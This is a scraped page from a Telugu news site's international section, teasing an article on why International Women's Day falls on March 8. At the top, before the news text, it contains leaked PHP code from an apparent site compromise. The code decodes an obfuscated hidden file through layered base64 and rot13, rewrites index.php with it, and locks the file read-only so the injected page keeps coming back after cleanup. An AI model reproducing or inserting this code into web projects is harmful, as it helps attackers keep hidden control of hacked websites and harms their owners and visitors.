$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } అంతర్జాతీయం - latest telugu news | బెస్ట్ లైవ్ న్యూస్ ఛానల్

అంతర్జాతీయ మహిళా దినోత్సవం ఎప్పుడు, ఎందుకు, ఎలా మొదలైంది? మార్చి 8నే ఎందుకు జరుపుకోవాలి?

ప్రజ్ఞ మీడియా ప్రేక్షకులకు అంతర్జాతీయ మహిళా దినోత్సవ శుభాకాంక్షలు. అంతర్జాతీయ మహిళా దినోత్స0...

Read More

Latest News